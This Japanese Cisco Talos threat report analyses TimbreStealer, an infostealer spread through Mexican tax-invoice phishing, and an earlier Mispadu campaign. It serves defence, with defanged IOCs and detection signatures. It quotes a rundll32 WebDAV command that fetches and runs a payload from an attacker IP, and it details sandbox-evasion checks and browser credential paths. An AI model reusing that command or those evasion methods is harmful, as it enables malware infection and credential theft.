- Cisco Talos は、未知のマルウェアをばらまく新たな攻撃を発見し、同マルウェアを「TimbreStealer」と命名しました。
- 攻撃者は、スパム攻撃によって TimbreStealer を配布しています。メキシコの税金に関連した内容のスパムメールを使用した攻撃で、遅くとも 2023 年 11 月には始まっています。この攻撃者は以前、同様の戦術、手法、手順(TTP)を使用して「Mispadu」というバンキング型トロイの木馬を拡散していました。
- TimbreStealer は難読化された新しい情報窃取マルウェアであり、メキシコのユーザーを狙っていると考えられます。
- TimbreStealer には、マルウェアバイナリのオーケストレーション、復号、保護に使用される複数のモジュールが埋め込まれています。
Talos は、メキシコの潜在的な被害者を狙ったフィッシングスパム攻撃が続いていることを確認しています。ユーザーを誘導して難読化された新しい情報窃盗マルウェア(Talos では TimbreStealer と命名)をダウンロードさせるという手口です。遅くとも 2023 年 11 月には攻撃が始まっています。この攻撃では、お金に関係していると思わせるフィッシングメールを使用して、ペイロードがホストされている侵害された Web サイトにユーザーを誘導し、悪意のあるアプリケーションを実行させます。
Talos は、同じ攻撃者による新しいスパム攻撃が遅くとも 2023 年 9 月から行われていることを確認しています。当初は、バンキング型トロイの木馬である Mispadu の亜種が、特定の地域からのみアクセスできるように設定された WebDAV サーバーを使って配布されていました。その後、ペイロードが今回の新しい情報窃取マルウェアに変更されています。新しい情報窃取マルウェアに変わってからは、Mispadu が使用された形跡は見つかっていません。
このフィッシング攻撃ではジオフェンシング手法を使用してメキシコのユーザーのみを攻撃対象にしており、メキシコ以外の場所からペイロードサイトに接続しようとすると、悪意のあるファイルではなく空の PDF ファイルが返されます。現在拡散されているスパムメールの内容は主に、CFDI というメキシコのデジタル納税に必要な領収書兼請求書に関するものでした(CFDI は「Comprobante Fiscal Digital por Internet」の略で、オンラインで発行されるデジタルインボイスのことです)。また、一般的な請求書に関する内容のメールも同じ攻撃で使用されていることを Talos では確認しています。
2 つの攻撃につながりがあることを示す確かな証拠は見つけられませんでしたが、今回の攻撃と以前の Mispadu を配布する攻撃では同じ TTP が使用されていることと、TimbreStealer の配布が始まってからは Mispadu が使用された形跡がないことから、同じ攻撃者の仕業であると Talos はほぼ確信しています。
難読化された新たな情報窃取マルウェア TimbreStealer
Talos は、2023 年 11 月に始まったメキシコのユーザーを標的にしたスパム攻撃の調査中に、情報窃盗マルウェアの新ファミリを特定しました。TimbreStealer という名前はこの攻撃で使用されているスパムメールの内容に由来します。攻撃については後ほど分析します。
TimbreStealer は、検出を回避し、密かに攻撃を仕掛け、侵害を受けたシステムに潜み続けるために高度な一連の手法を用います。たとえば、通常行われている API の監視をバイパスするためにシステムコールを直接実行する、Heaven’s Gate の手口を使って 64 ビットコードを 32 ビットプロセス内で実行する、カスタムローダーを利用する、といった手法です。このような特徴からも非常に巧妙に仕組まれていることがうかがえ、高度な技術を持つ作成者がこれらのコンポーネントを内製していると思われます。
Heaven’s Gate を使用した 64 ビットへの切り替えを示すコードのスニペット
これから分析するサンプルは、スパムメール内のリンクをクリックして侵害された Web サイトを訪れた被害者のマシンで見つかったものです。
このブログの分析で使用したサンプル
分析の結果、マルウェアの「.data」セクションに埋め込まれた複数のモジュールのほか、メインのオーケストレーション DLL とグローバル復号キーを使用する複雑な復号プロセスを特定しました。このキーは異なるモジュール間で使用され、各段階で更新されます。この分析はまだ完了していませんが、最初のいくつかのモジュールとモジュール間の関係だけでも説明したいと思います。
TimbreStealer の復号プロセス
第 1 レイヤの実行ファイルは圧縮されており、「.data」セクションに DLL が埋め込まれています。ローダーはまず Ntdll をスキャンしてすべての Zw* エクスポートを検索し、関数の順序付きハッシュテーブルを作成します。ここからは、機密性の高い API はすべて、カーネルに対して直接システムコールを実行することによって呼び出されます。このとき 64 ビットマシンの場合は、syscall を実行する前に Heaven’s Gate を使用して 32 ビットモードから 64 ビットモードに変換されます。
API の使用を隠すために TimbreStealer が使用する、システムコールを実行する 2 通りの方法を示すコードのスニペット
この処理が終わると、次は .data セクションから、次段階のペイロードを復号します。復号された DLL は MZ ヘッダーと PE シグニチャが消去されていますが、これはこのマルウェアで一貫して使用される手法です。ここでカスタム PE ローダーが先程の DLL を起動し、エクスポートされた関数に Zw* ハッシュテーブルを引数として渡します。
すべてのサブモジュールの復号には、グローバル復号キーが使用されます。マルウェアの実行が進むにつれ、このキーは何度も暗号化されます。想定されている実行のパスの手順を 1 つでも外れると復号キーは同期しなくなり、後続の復号はすべて失敗します。
リバースエンジニアがロジックを省略して強制復号したり、静的に引数を抽出してペイロードにアクセスしたりできないようになっているので、分析を回避するためのチェックをすべて突き止め、無効化しなければなりません。グローバルキーの暗号化ラウンドはコードのあちこちに書き込まれており、別のサブモジュールの中から始まる場合もあります。
このマルウェアでは、すべての段階で同じコーディングスタイルと手法が使われています。このことからも、すべての難読化レイヤと最終ペイロードは同じ作成者が開発した可能性が高いと考えられます。
TimbreStealer の埋め込みモジュール
最初のレイヤを抽出すると、TimbreStealer は攻撃対象として相応しいシステムか、また実行環境がサンドボックスかどうかをチェックします。さらに、ペイロードに埋め込まれている多数のサブモジュールを抽出します。メインのペイロードが抽出された後に、Talos は少なくとも 3 種類のレイヤを特定しました。各レイヤにはさまざまな機能のための複数のモジュールがあります。
TimbreStealer のモジュール間の関係性を示す図
このマルウェアの第 2 段階はオーケストレータのレイヤであり、攻撃対象となるシステムを検出し、後続のすべてのモジュールを抽出する役割を担います。システムが攻撃対象となるか判断するために、マルウェアはまずシステムの言語がロシア語でないことを確認し、次にタイムゾーンが中南米のいずれかの地域に設定されていることを確認します。その後、CsrGetProcessId デバッガチェックを実行し、デスクトップの子ウィンドウの数をカウントして、実行環境がサンドボックスではないことを確認します。
この段階でマルウェアはミューテックスチェックも行い、以前に感染した可能性を示すファイルやレジストリキーがないかを調べ、ブラウザをスキャンして自然な使い方がされているかを確認します。マルウェアがチェックするファイルとレジストリキーの一部を以下に示します。
- HKLM\SOFTWARE\Microsoft\CTF\TIP\{82AA36AD-864A-2E47-2E76-9DED47AFCDEB}
- {A0E67513-FF6B-419F-B92F-45EE8E03AEEE} = <value>
- {E77BA8A1-71A1-C475-4F73-8C78F188ACA7} = <value>
- {DB2D2D69-9EE0-9A3C-2924-67021A31F870} = <value>
- {6EF3E193-61BF-4F68-9736-51CF6905709D} = <value>
- {3F80FA11-1693-4D05-AA83-D072E69B77FC} = <value>
- {419EEE13-5039-4FA4-942A-ADAE5D4ED5C3} = <value>
- C:\Windows\Installer\{E1284A06-8DFA-48D4-A747-28ECD07A2966}
- Global\I4X1R6WOG6LC7APSPY1YAXZWJGK70AZARZEGFT3U
上述のチェックのほか、これらのキーがあった場合は、マルウェアのこれ以降の段階は実行されません。
オーケストレータにはその他 4 つの暗号化されたサブモジュールが含まれます。
IDX | サイズ | CRC32 | 目的 |
0 | 8kb | 0xF25BEB22 | シンボル情報がない DLL 用のシェルコードローダー |
1 | 100kb | 0xEB4CD3EC | DLL – 未分析 |
2 | 60kb | 0xFA4AA96B | DLL – 仮想マシン対策と分析回避のためのチェック、攻撃対象にするシステムかのチェック |
3 | 3.92mb | 0xAB029A74 | DLL – 暗号化されたペイロードを含むインストーラ |
すべての BLOB は親ローダー関数を通じてアクセスされます。この関数はデータの予想される Zlib CRC32 ハッシュを確認し、指定があれば raw データを圧縮解除することもできます。この全体アーキテクチャがすべてのレイヤで確認されました。
シンボル情報がない各 DLL はカスタムのシェルコードローダーによってサブモジュール 0 番(IDX = 0)からロードされます。このシェルコードに、ZwCreateThreadEx API を使って Heaven’s Gate のスタブ経由で実行が転送されます。
埋め込まれたシェルコードモジュールを TimbreStealer が実行する方法を示すコードのスニペット
サブモジュール 2 番は分析回避のための DLL で、複数のチェックを行い、グローバル復号バッファのさまざまな領域で暗号化ラウンドを実行します。チェックが 1 つでも失敗すると、インストーラモジュールは正しく復号できません。このレイヤでは以下のチェックが行われます。
- VMware のフックとポートのチェック
- デバッガを検出するための Vpcext、IceBP、int 2D 命令
- 物理ドライブに次の文字列があるかのチェック:qemu、virtual、vmware、vbox、xensrc、sandbox、geswall、bufferzone、safespace、virtio、harddisk_ata_device、disk_scsi_disk_device、disk_0_scsi_disk_device、nvme_card_pd、google_persistentdisk
これらのチェックがすべて想定どおりに完了すると、最終モジュールを正常に復号できます。
サブモジュール 3 番はインストーラレイヤで、複数のファイルをディスクにドロップして実行をトリガーします。疑いを招かないように無害な偽ドキュメントも表示されます。
攻撃対象のマシンであることが確認された後に、ペイロードのインストーラモジュールがドロップしたファイル
ITaskService COM インターフェイスを介してタスクを登録することによって実行がトリガーされます。スケジュールされたタスクは Microsoft の reg.exe を使用して、一度だけ実行されるレジストリキーを追加します。その後、rundll32.exe をトリガーしてシステムの iernonce.dll を通じてこのエントリを処理します。
インストールされた DLL を実行するためのスケジュールされたタスクの設定
一定の条件下では、このレイヤはグループポリシーのオプションを変更して起動スクリプトを設定することも可能です。
インストールされた TimbreStealer の DLL モジュール
インストールされた Cecujujajofubo475.dll という名前の DLL は、上述の最初の DLL と同じ全体アーキテクチャを使用します。内部の文字列はすべて暗号化されており、グローバル復号バッファを用います。また、別の Zw* API ハッシュテーブルを使用して直接 syscall を実行することによってユーザー API を回避します。
このレイヤには、グローバル復号バッファの暗号化をさらに複雑にするための TLS コールバックもあります。第三者のマシンでの分析を防ぐために、上記のレジストリキー内の親プロセスの名前と値に応じた暗号化の追加ラウンドも加えられています。
この DLL には、8 つの暗号化されたサブモジュールが含まれています。
IDX | サイズ | CRC32 | 目的 |
0 | 0x1000 | 0x2B80E901 | 5 つの引数を受け入れる単一の XOR 関数 |
1 | 0x1000 | 0x520200E8 | x64 シェルコードの PE ローダー |
2 | 0x2000 | 0x105542F7 | x86 シェルコードの PE ローダー |
3 | 0x2000 | 0xC4ECE0A8 | 不明なシェルコード |
4 | 0x7600 | 0xC1384E15 | 不明なモジュール(他の BLOB の圧縮解除に使用されると思われる) |
5 | 0xD800* | 0x1D38B250 | 仮想マシン対策とサンドボックスのレイヤ |
6 | 0x1B600* | 0x4F1FEFE3 | メインのペイロードを抽出する x86 DLL |
7 | 0x1EE00* | 0xF527AC18 | メインのペイロードを抽出する x64 DLL |
* が付いているものは、復号後に BLOB が圧縮解除されます。列に表示されているのは圧縮解除後のサイズです。
この DLL にはインストール段階で確認されたものと同じ保護機能の多くが含まれていますが、このレイヤではさらにいくつかの保護機能が特定されています。その 1 つめは、ZwTraceEvent API へのパッチで、Windows データ収集のユーザーモードでのイベントトレースを無効化します。
もう 1 つ興味深いのは、プロセス内にロードされているすべての DLL(2 段階)を、そのディスクからのクリーンなコピーで上書きする保護機能です。これにより、ウイルス対策ベンダーのユーザーモードのフック、ソフトウェアのブレークポイント、ユーザーによるパッチが、実行中にすべて消去されます。
この DLL は、前の関係図で示した ApplicationIcon.ico ファイルに入っている最終ペイロードのローダーとしての役割を担います。サブモジュール 7 番は、サブモジュールが起動を試みるデフォルトのローダーになります。この 64 ビット DLL を svchost.exe プロセスの優先リストに挿入しようとします。
優先順位は svchost.exe プロセスのコマンドラインに基づいており、以下の文字列を探します。
- DcomLaunch
- Power
- BrokerInfrastructure
- LSM
- Schedule
svchost.exe プロセスへの挿入が失敗した場合は、バックアップの 32 ビットのフォールバックシェルコードも使用できます。このモードでは、2 段階のシェルコードがサブモジュール 6 番からロードされて実行を受け継ぎます。コンテキストが変更された syscall を使って新しいスレッドが作成され、その後 ResumeThread が実行をトリガーします。シェルコードのメモリの割り当てもすべて、先に設定されている syscall を使用して実行されます。
シェルコードの第 1 段階が第 2 段階を復号し、その後 ApplicationIcon.ico ファイルから最終ペイロードとなる DLL を抽出して復号します。32 ビットバージョンはここでもカスタム PE ローダーを使用して、最終ペイロードとなる DLL を直接ロードして、抽出後に自身のプロセス内で実行します。
TimbreStealer の最終ペイロードモジュール
このレイヤのアーキテクチャはこれまでのアーキテクチャと同じで、さらに 9 つのサブモジュールが含まれます。この最終ペイロードモジュールとサブモジュールの分析は、この記事の執筆時点ではまだ継続中です。
IDX | サイズ | CRC32 | 目的 |
0 | 0X1000 | 0X2B80E901 | 5 つの引数を受け入れる単一の XOR 関数。1 つ前のレイヤの BLOB 0 番と同じ |
1 | 0X1000 | 0X520200E8 | x64 シェルコードの PE ローダー。1 つ前のレイヤの BLOB 1 番と同じ |
2 | 0X2000 | 0X105542F7 | x86 シェルコードの PE ローダー。1 つ前のレイヤの BLOB 2 番と同じ |
3 | 0X2000 | 0XC4ECE0A8 | 不明なシェルコード。1 つ前のレイヤの BLOB 3 番と同じ |
4 | 0XA5000* | 0XB0214A74 | 未分析 |
5 | 0x13CC00* | 0xE8421ADE | 未分析 |
6 | 0x16800* | 0xD30A298E | 未分析 |
14 | 0x16600* | 0x55BFB99 | 未分析 |
15 | 0x7C800* | 0x2F6F928D | 未分析 |
* が付いているものは、復号後に BLOB が圧縮解除されます。列に表示されているのは圧縮解除後のサイズです。
このモジュールから復号できた文字列を基に、現時点で分析できたマルウェアの機能を以下に示します。このマルウェアにはマシンからさまざまな情報を収集し、外部の Web サイトにデータを POST 送信する機能があることがうかがえます。これは、情報窃盗マルウェアの典型的な動作です。
被害者のマシンからログイン情報を収集する
ファイルやディレクトリをスキャンする関数からは以下の文字列が見つかりました。このモジュールには SQLite ライブラリも埋め込まれており、さまざまなブラウザのログイン情報保存ファイルを管理できるようになっています。
- CloudManagementEnrollmentToken
- Google\\Chrome Beta\\User Data
- Google\\Chrome Dev\\User Data
- Google\\Chrome SxS\\User Data
- Google\\Chrome\\User Data
- Google\\Policies
- Microsoft\\Edge Beta\\User Data
- Microsoft\\Edge Dev\\User Data
- Microsoft\\Edge\\User Data
- Software\\Google\\Chrome
- Software\\Google\\Chrome\\Enrollment
- Software\\Google\\Enrollment
- Software\\Google\\Update\\ClientState\\{430FD4D0-B729-4F61-AA34-91526481799D}
- SOFTWARE\\Microsoft\\Cryptography
- Software\\Policies\\Google\\Chrome
- Software\\Policies\\Google\\Update
- history
- feeds
- feeds cache
- internet explorer
- media player
- office
- OneDrive
- packages
- Skydrive
- Formhistory.sqlite
- SELECT count(`place_id`) FROM `moz_historyvisits` WHERE `place_id` = %I64u;
- SELECT `id`, `url`, `visit_count` FROM `moz_places` WHERE `last_visit_date`
- Mozilla\\Firefox\\Profiles\\
- Thunderbird\\Profiles\\
- Postbox\\Profiles\\
- PostboxApp\\Profiles\\
- SOFTWARE\\Mozilla\\Mozilla Firefox
- SOFTWARE\\Mozilla\\Mozilla Thunderbird
- SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\ProfileList
ファイルを検索する
マルウェアは、複数のディレクトリをスキャンしてファイルの検索も行いますが、その目的はまだ分かっていません。以下にリストしているように、AdwCleaner、Avast Scanner、360 Antivirus の隔離フォルダに関連するフォルダが対象に含まれています。
それ以外で興味深いのは「.Spotlight-V100」と「.fseventsd」で、両方とも MacOS に関連する文字列です。
- $360Section
- $AV_ASW
- $GetCurrent
- $Recycle.Bin
- $SysReset
- $WinREAgent
- .fseventsd
- .Spotlight-V100
- AdwCleaner
- AMD
- Autodesk
- boot
- Brother
- Config.Msi
- Documents and Settings
- EFI
- Hewlett-Packard
- inetpub
- Intel
- MSOCache
- PerfLogs
- Program Files
- Program Files (x86)
- ProgramData
- Recovery
- RecoveryImage
- Resources
- SWSetup
- System Volume Information
- SYSTEM.SAV
- ~MSSETUP.T
- $WINDOWS.
- AutoKMS
- KMSAuto
- Users
- AppData\\Local
- AppData\\Roaming
- Desktop
- Documents
- Downloads
- OneDrive
- Dropbox
OS の情報を収集する
TimbreStealer は Windows Management Instrumentation(WMI)インターフェイスとレジストリキーを使用して、現在実行中のマシンに関する豊富な情報を収集します。
- OS 情報:Description、IdentifyingNumber、Manufacturer、Name、Product、ReleaseDate、InstallDate、InstallTime
- SMB BIOS 情報:SMBIOSBIOSVersion、SMBIOSMajorVersion、SMBIOSMinorVersion、SerialNumber、Vendor、Version
- ハードウェア情報:Win32_ComputerSystemProduct、Win32_BaseBoard、Win32_Bios、Win32_PhysicalMemory
- ネットワークドメイン情報:StandaloneWorkstation、MemberWorkstation、StandaloneServer、MemberServer、BackupDomainController、PrimaryDomainController
- アプリケーション情報:DisplayName、Publisher、DisplayVersion、OSArchitecture
ファイル拡張子を検索する
特定のファイル拡張子の検索も行います。なお、下記の「.zuhpgmcf」は既知のどのファイルタイプにも関連しない拡張子です。マルウェア自体が作成したファイルの可能性も考えられます。
- .bak, .fbk, .dat, .db, .cmp, .dbf, .fdb, .mdf, .txt, .cer, .ods, .xls, .xlsx, .xml, .zuhpgmcf
アクセスされた URL を検索する
以下の文字列はマルウェアが検索対象にする URL を表しています。ネットワークパケットをキャプチャするための仮想デバイスの名前もあり、マルウェアがネットワークスニッフィングを行う可能性も考えられます。
- npf
- npcap
- npcap_wifi
- www.google.com
- amazon.com
- dropbox.com
- linkedin.com
- twitter.com
- wikipedia.org
- facebook.com
- login.live.com
- apple.com
- www.paypal.com
システム保護を無効化する
マルウェアは、マシン上のシステム復元ポイントを削除するために使用する関数の呼び出しを実行します。Talos ではまだ感染したマシン上でランサムウェアのアクティビティは確認していませんが、これはランサムウェア型のマルウェアによく見られる動作です。この仮説が正しいか結論づけるには、さらなる分析が必要です。
- SELECT * FROM SystemRestore
- SequenceNumber
- SrClient.dll
- SRRemoveRestorePoint
- SYSTEM\\CurrentControlSet\\Control\\Session Manager\\Power
- HiberbootEnabled
リモート デスクトップ ソフトウェアを検索する
マルウェアはリモート デスクトップ サーバーが使用するサービスやミューテックスへのアクセスを試みます。ただし、これがペイロードコードの中でどのように使用されるのかはまだ明確になっていません。
- console
- TermService
- Global\\TermSrvReadyEvent
- winlogon.exe
- console
リモートサイトにデータを POST する
ネットワークにアクセスする関数の中で、URL と HTTP 通信で使用される文字列がいくつか見つかりました。これらの URL は TimbreStealer の配布に使用される他の URL とはフォーマットが異なります。おそらくこれらの URL や文字列はマルウェアが使用するコマンドアンドコントロール サーバーであると思われますが、これまでのところ、Talos が分析したサンプルはこのいずれとも通信していません。
- POST
- PUT
- Content-Disposition: form-data; name=”
- “; filename=”
- “\\r\\nContent-Type: application/octet-stream\\r\\n
- Content-Type: multipart/form-data; boundary=
- Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
- Mozilla/5.0 (Windows NT 10.0; Trident/7.0; rv:11.0) like Gecko
- HTTP/1.1 200 OK\\r\\nDate: %s %s GMT\\r\\nConnection: Close\\r\\nAccess-Control-Allow-Origin: *\\r\\nAccess-Control-Allow-Headers: Origin, X-Requested-With, Content-Type, Accept\\r\\nContent-Type: text/plain;charset=UTF-8\\r\\n\\r\\n
- https://hamster69[.]senac2021[.]org/~armadillo492370/https://snapdragon50[.]crimsondragonemperor[.]com/~aster963249/https://69[.]64[.]35[.]1/~route649289/
これらの文字列は解明の糸口に過ぎず、本当の目的を理解するためには最終ペイロードとその埋め込みモジュールについてもっと分析が必要です。
過去の Mispadu スパム攻撃
現在行われている配布攻撃に関連した活動が最初に観察されたのは 2023 年 9 月で、脅威グループは Mispadu 情報窃盗マルウェアの亜種を配布していました。この攻撃では侵害された Web サイトを使って Zip アーカイブを配布しており、その中の「.url」ファイルを被害者がダブルクリックすると、WebDAV ファイルパスを使用して外部でホストされているファイルを実行するようになっていました。
Mispadu 攻撃で使用されたインターネット ショートカット(.url)ファイル
どちらの URL もリモート UNC パスで、ポート「@80」を指定して WebDAV 経由で強制接続を行っています。この接続は Rundll32.exe によって実行され、下記の例に示すパラメータが使用されています。
- rundll32.exe C:\Windows\system32\davclnt.dll,DavSetCookie 159[.]89[.]50[.]225@80 http://159[.]89[.]50[.]225/formato23/9577710738/1242144429.exe
この攻撃では、すべての WebDAV サーバーが、メキシコにある IP アドレスからのみ接続を許可するように設定されていました。
.url ファイルにはさまざまな名前が付けられていましたが、ほとんどの場合、Registro Federal de Contribuyentes(連邦納税者登録)の略である「RFC」が含まれていました。このことからお金に関係することだと思わせようとしていることがうかがえます。また多くの場合、.url ファイル名には 6 桁の乱数が含まれていました。
Mispadu のペイロードには、通信プロトコルとして HTTPS を使用する C2 のアドレスがハードコーディングされていました。さまざまな C2 の URL が使用され、時間とともに変化してはいますが、「f」と「w」という 2 つのパラメータを持ち「it.php」を指すという類似パターンが続いています。
- hxxps://trilivok[.]com/2ysz0gghg/cbt0mer/it.php?f=2&w=Windows%2010
- hxxps://trilivok[.]com/3s9p2w9yy/bvhcc5x/it.php?f=9&w=Windows%2010
- hxxps://chidoriland[.]com/1r49ucc73/hs4q07q/it.php?f=2&w=Windows%2010
- hxxps://manderlyx[.]com/cruto/it.php?f=2&w=Windows%2010
- hxxps://bailandolambada[.]com/5iplivg7q/gn4md5c/it.php?f=2&w=Windows%2010
この攻撃が活発だったのは 11 月中旬までで、この頃、新しい TimbreStealer ペイロードが侵害された Web サイトから被害者のコンピュータにドロップされました。
この攻撃の標的となる業界はさまざまな業種にわたっていますが、以下のように製造業と輸送がやや集中して狙われています。
Mispadu 攻撃で最も狙われた業界を示すグラフ
CFDI をおとりに利用したスパム攻撃
Talos は 11 月中旬頃から、CFDI の PDF 文書に見せかけた悪意のあるファイルをダウンロードさせて実行させようとする少量のスパムメールを検出していました。この攻撃は 2024 年 2 月現在もまだ続いています。CFDI はメキシコの税務申告で提出が義務付けられている電子インボイスの規格です。この攻撃では、スパムメールに誘導されたユーザーが、侵害された Web サイトでホストされている悪意のある Web ページにリダイレクトされていました。
新しい TimbreStealer マルウェアを配布するスパムメールの例
この攻撃で確認された件名は同じく CFDI 関連のものでした。
- Recibió un Comprobante Fiscal Digital (CFDI). Folio Fiscal: fcd7bf2f-e800-4ab3-b2b8-e47eb6bbff8c
- Recibió una Factura. Folio Fiscal: 050e4105-799f-4d17-a55d-60d1f9275288
この Web サイトは JavaScript を使用しており、地理位置情報やブラウザの種類といったユーザーの特性を検出してから .url ファイルを含む Zip ファイルのダウンロードを開始します。それが完了すると、WebDAV を使って最初の TimbreStealer ドロッパーのダウンロードが始まります。Zip ファイルにはたいていの場合、同じく CFDI 関連の名前が付けられていました。
- CFDI_930209.zip
- FACTURA_560208.zip
アクセスがメキシコからでない場合は、悪意のあるペイロードの代わりに空の PDF ファイルが返されます。
最初のドロッパーマルウェアがダウンロードされるサイトをユーザーが訪問した後に表示されるメッセージ
現在の攻撃で使用されている URL はすべて同様のフォーマットを使用しています。
- hxxps://<some>.<compromised>[.]<web>/<token>/<14_char_hex_id>
上記の <token> には、「cfdi」、「factura」、「timbreDigital」、「facdigital」、「seg_factura」のいずれかの文字列が入ります。また、ドメインの始めの部分はデジタルインボイスに関連するランダムなスペイン語の単語で、その後に数字が 2 つ続きます。
- hxxps://pdf85[.]miramantolama[.]com/factura/74f871b7ca1977
- hxxps://suscripcion24[.]facturasonlinemx[.]com/factura/d6a6f8208ed508
- hxxps://suscripcion65[.]g1ooseradas[.]buzz/factura/9f03d9ef3d73b5
- hxxps://timbrado11[.]verificatutramite[.]com/facdigital/f7640878ebc0f9
今回の .url ファイルはウイルス対策製品に検出されにくくするためにさらに難読化されていますが、一方で、悪意のあるファイルのダウンロードには依然として HTTP 経由の WebDAV が使用され、アイコンは PDF ファイルの表示になっています。
TimbreStealer 攻撃で使用されているインターネット ショートカット(.url)ファイル
マルウェアを実行するには、ユーザーの操作(ダウンロードされた Zip ファイルを開き、.url ファイルをダブルクリック)が必要です。この操作を行った時点で、TimbreStealer の主な感染が始まります。
TimbreStealer 攻撃で使用されている ATT&CK TTP
ATT&CK ID | 説明 |
T1566.002 | スピアフィッシング攻撃リンク |
T1566.001 | 添付ファイルによるスピアフィッシング攻撃 |
T1204.002 | 悪意のあるファイル |
T1105 | 侵入ツールの転送 |
T1190 | 外部公開されたアプリケーションへの攻撃 |
T1071.001 | Web プロトコル |
T1036.005 | 偽装:正規の名称や場所に合致 |
T1483 | ドメイン生成アルゴリズム |
T1071 | アプリケーション層プロトコル |
T1027.009 | 難読化されたファイルまたは情報:埋め込みペイロード |
T1027.010 | 難読化されたファイルまたは情報:コマンドの難読化 |
T1027.002 | 難読化されたファイルまたは情報:ソフトウェアパッキング |
T1564.001 | アーティファクトの非表示:非表示ファイルとディレクトリ |
T1497.003 | 仮想環境/サンドボックスの回避:時間ベースの回避 |
T1497.001 | 仮想環境/サンドボックスの回避:システムチェック |
T1497.002 | 仮想環境/サンドボックスの回避:ユーザー アクティビティ ベースのチェック |
T1055.002 | プロセスインジェクション:PE インジェクション |
T1055.001 | プロセスインジェクション:DLL インジェクション |
T1055.012 | プロセスインジェクション:プロセスの空洞化 |
T1140 | ファイルまたは情報の難読化/デコード |
T1574.002 | ハイジャック実行フロー:DLL サイドローディング |
T1082 | システム情報の検出 |
T1486 | データ暗号化による被害 |
T1070.001 | 痕跡の削除:Windows イベントログのクリア |
T1012 | レジストリのクエリ |
T1140 | ファイルまたは情報の難読化/デコード |
T1204 | ユーザーによる実行:悪意のあるファイル |
T1053.003 | スケジュール設定されたタスク/ジョブ:Cron |
T1053.005 | スケジュール設定されたタスク/ジョブ:スケジュール設定されたタスク |
T1547.001 | 起動時またはログオン時の自動実行:レジストリの実行キー/スタートアップフォルダ |
T1112 | レジストリの変更 |
カバレッジ
今回の脅威は、以下の製品で検出してブロックすることが可能です。
Cisco Secure Endpoint(旧 AMP for Endpoints)は、この記事で説明したマルウェアの実行を阻止するのに最適です。Cisco Secure Endpoint の無料トライアルはこちらからお申し込みください。
Cisco Secure Web Appliance の Web スキャンは、悪意のある Web サイトへのアクセスを防止し、上述したような攻撃で使用されるマルウェアを検出します。
Cisco Secure Email(旧 E メールセキュリティ)は、攻撃の一環として攻撃者が送りつける不正な電子メールをブロックします。Cisco Secure Email の無料トライアルはこちらからお申し込みください。
Threat Defense Virtual、適応型セキュリティアプライアンス、Meraki MX など、Cisco Secure Firewall(旧次世代ファイアウォールおよび Firepower NGFW)アプライアンスは、この脅威に関連する悪意のあるアクティビティを検出できます。
Cisco Secure Malware Analytics(Threat Grid)は、悪意のあるバイナリを特定し、シスコのすべてのセキュリティ製品に保護機能を組み込みます。
Umbrella(シスコのセキュア インターネット ゲートウェイ(SIG))は、社内ネットワークの内外で悪意のあるドメイン、IP、URL への接続をブロックします。Umbrella の無料トライアルはこちらからお申し込みください。
Cisco Secure Web Appliance(旧 Web セキュリティアプライアンス)は、危険性のあるサイトを自動的にブロックし、ユーザーがアクセスする前に疑わしいサイトを検査します。
特定の環境および脅威データに対する追加の保護機能は、Firewall Management Center から入手できます。
Cisco Duo は、ユーザーに多要素認証を提供し、承認されたユーザーのみがネットワークにアクセスできるようにします。
オープンソースの Snort サブスクライバルールセットをお使いであれば、Snort.org で購入可能な最新のルールパックをダウンロードすることで、最新状態を維持できます。
この脅威を検出する Snort SID は、63057 ~ 63072 と 300840 ~ 300844 です。
今回の脅威に関連するマルウェアアーティファクトを検出するために、以下の ClamAV シグネチャがリリースされました。
- Win.Infostealer.TimbreStealer-10021027-0
- Win.Infostealer.TimbreStealer-10021026-0
- Win.Infostealer.Generic-10017202-0
- Win.Packed.Generic-10019162-0
- Win.Dropper.Generic-10017203-0
IOC(侵入の痕跡)
この調査の IOC は、こちらの GitHub リポジトリで提供しています。
潜在的な C2 URL
hxxps://hamster69[.]senac2021[.]org/~armadillo492370/
hxxps://snapdragon50[.]crimsondragonemperor[.]com/~aster963249/
hxxps://69[.]64[.]35[.]1/~route649289/
IP
24[.]199[.]98[.]128
159[.]89[.]50[.]225
104[.]131[.]169[.]252
104[.]131[.]67[.]109
137[.]184[.]108[.]25
137[.]184[.]115[.]230
138[.]197[.]34[.]162
142[.]93[.]50[.]216
143[.]244[.]144[.]166
143[.]244[.]160[.]115
146[.]190[.]208[.]30
157[.]230[.]238[.]116
157[.]245[.]8[.]79
159[.]223[.]96[.]160
159[.]89[.]226[.]127
159[.]89[.]90[.]109
162[.]243[.]171[.]207
167[.]71[.]24[.]13
167[.]71[.]245[.]175
167[.]71[.]246[.]120
192[.]241[.]141[.]137
24[.]144[.]96[.]15
45[.]55[.]65[.]159
64[.]225[.]29[.]249
ドロップサイト URL
hxxp://folio24[.]spacefordailyrituals[.]com/facdigital/55ae12184283dc
hxxp://folio47[.]marcialledo[.]com/seg_factura/e6bab6d032e282
hxxp://pdf43[.]marcialledo[.]com/factura/50e1e86db86ff2
hxxp://suscripcion95[.]servicioslomex[.]online/cfdi/0faa4a21fff2bb
hxxps://0[.]solucionegos[.]top/timbreDigital/e99522f778ea6a
hxxps://auditoria38[.]meinastrohoroskop[.]com/factura/b5b0c16b999573
hxxps://auditoria42[.]altavista100[.]com/factura/b20569ae393e7e
hxxps://auditoria67[.]mariageorgina[.]com/cfdi/bb743b25f5c526
hxxps://auditoria7[.]miramantolama[.]com/factura/d84d576baf1513
hxxps://auditoria82[.]taoshome4sale[.]com/seg_factura/efebfc104991d4
hxxps://auditoria84[.]meinastrohoroskop[.]com/timbreDigital/8f7b2f8304d08e
hxxps://auditoria88[.]mariageorgina[.]com/factura/3db4832ada4f80
hxxps://auditoria89[.]venagard[.]com/timbreDigital/f6a5f34123d980
hxxps://auditoria92[.]venagard[.]com/factura/2c6652a143f815
hxxps://auditoria93[.]serragrandreunion[.]com/timbreDigital/a2e79b61ac4635
hxxps://comprobante14[.]miramantolama[.]com/seg_factura/fb0b02b2d41b12
hxxps://comprobante2[.]marcialledo[.]com/factura/3ce069ac2b865e
hxxps://comprobante27[.]mariageorgina[.]com/timbreDigital/eada68119275aa
hxxps://comprobante27[.]serragrandreunion[.]com/facdigital/bca7513c9e00b9
hxxps://comprobante27[.]servicioslocomer[.]online/factura/2003b3fe7ae6f4
hxxps://comprobante45[.]altavista100[.]com/cfdi/d13011c95ba2b0
hxxps://comprobante51[.]meinastrohoroskop[.]com/facdigital/121c0388193ba5
hxxps://comprobante63[.]serragrandreunion[.]com/facdigital/3c45bca741d4f6
